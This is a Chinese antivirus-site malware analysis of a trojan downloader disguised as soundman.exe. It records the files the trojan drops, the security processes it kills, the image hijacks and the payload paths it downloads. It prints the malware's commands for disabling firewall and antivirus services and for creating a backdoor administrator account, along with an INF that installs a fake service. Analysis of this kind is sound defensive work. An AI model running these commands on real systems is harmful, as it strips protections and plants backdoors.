首页 | 最新病毒 | 反病毒学院 | qq病毒专杀 | arp病毒 | MSN病毒 | auto病毒专杀 | U盘病毒 | downloader病毒 | 木马查杀 | 计算机病毒 | 最新漏洞   
您的位置: 首页 >> 木马查杀 >> 阅读资讯:伪soundman.exe木马下载器(qoq.exe notepde.exe )解决

伪soundman.exe木马下载器(qoq.exe notepde.exe )解决

[ 作者:一把锈剑 | 更新日期:2008-4-9 09:16:45 | 阅读次数: ]

伪soundman.exe木马下载器解决

 特征 qoq.exe notepde.exe popo.exe

1,删除旧版本的病毒然后释放以下文件文件
%windir%\soundman.exe(病毒主程序,木马下载器,图标和常见的soundman程序一样)
%windir%\system32\ttjj3.ini
%windir%\system32\interne.exe
%windir%\system32\qoq.exe (这个应该是PR端口扫描工具)
%windir%\system32\notepde.exe
引用:
2,通过进程枚举,关闭以下进程

shstat.exe
runiep.exe
ras.exe
MPG4C32.exe
imsins.exe
Iparmor.exe
360safe.exe
360tray.exe
kmailmon.exe
kavstart.exe
avp.exe
ccenter.exe
引用:
3,通过rtcShell运行cacls获取cmd.exe的权限,然后通过net stop sc 命令来关闭一些服务,并创建一个new1的管理员帐号

cacls.exe C:\winnt\system32\cmd.exe /e /t /g everyone:F

net stop wscsvc
net stop sharedaccess
sc config sharedaccess start= disabled
sc config wscsvc start= disabled
net stop KPfwSvc
net stop KWatchsvc
net stop McShield
net stop "Norton AntiVirus Server"


net user new1 12369 /add
net user new1 12369
net user new1 /active:yes
net localgroup administrators new1 /add
引用:
4.映象挟持kmailmon.exe,任务管理器等正常程序 ,其中挟持ctfmon来启动病毒程序soundman.exe

360Loader.exe
360Safe.exe
360tray.exe
IceSword
ctfmon.exe
Iparmor.exe
kmailmon.exe
iparmor.exe
ras
runiep
taskmgr.exe
引用:
5,尝试删除一些安全软件的启动项目,但是是否成功就不得而知了

hkey_local_machine\software\microsoft\windows\currentversion\run\360safetray
hkey_local_machine\software\microsoft\windows\currentversion\run\kavstart
hkey_current_user\software\microsoft\windows\currentversion\run\kavpfw
hkey_local_machine\software\microsoft\windows\currentversion\run\vptray
hkey_local_machine\software\microsoft\windows\currentversion\run\kav
hkey_local_machine\software\microsoft\windows\currentversion\run\runeip
hkey_local_machine\software\microsoft\windows\currentversion\run\ravtask
hkey_local_machine\software\microsoft\windows\currentversion\run\rfwmain
引用:
6,重命名ieprot.dll为iepret.dll,safemon.dll为safemes.dll 估计重启以后不能运行了 ^_^
引用:
7,生成1.inf通过rundll32.exe安装为服务Help and Support(注意这个本身是系统帮助支持中心但是被病毒替换了)

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=helpsvc,,My_AddService_Name
[My_AddService_Name]
DisplayName=Help and Support
Description=启用在此计算机上运行帮助和支持中心。如果停止服务,帮助和支持中心将不可用。如果禁用服务,任何直接依赖

于此服务的服务将无法启动。
ServiceType=0x10
StartType=2
ServiceBinary=%11%\interne.exe
ErrorControl=0
引用:

8.上传中招者的ip地址到病毒作者的服务器 下载盗号木马机器狗病毒等病毒文件,并通过端口扫描工具PR扫描局域网和IP段 135

端口是否有打开  保存在C:\Por.aed文件中^_^
/rc/zj/gx.jpg 貌似是自我更新啊
ssave.jpg     
notepde.jpg  加了一个未知壳,似乎是一个远程控制木马
/and/1.exe
.....
/and/11.exe(11-19链接失效了)

/and/19.exe


.....
/and/25.exe

www.newjian.com


Tags:伪soundman.exe 木马下载器 qoq.exe notepde.exe popo.exe
来源:
上一篇:病毒囚禁输入法的处理方法  下一篇:TrojanDownloader:Win32/Small.gen!N 分析查杀
您的评论
用户名:新注册) 密码: 匿名评论 [所有评论]

·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为
热点资讯

精彩推荐

最新资讯

随机推荐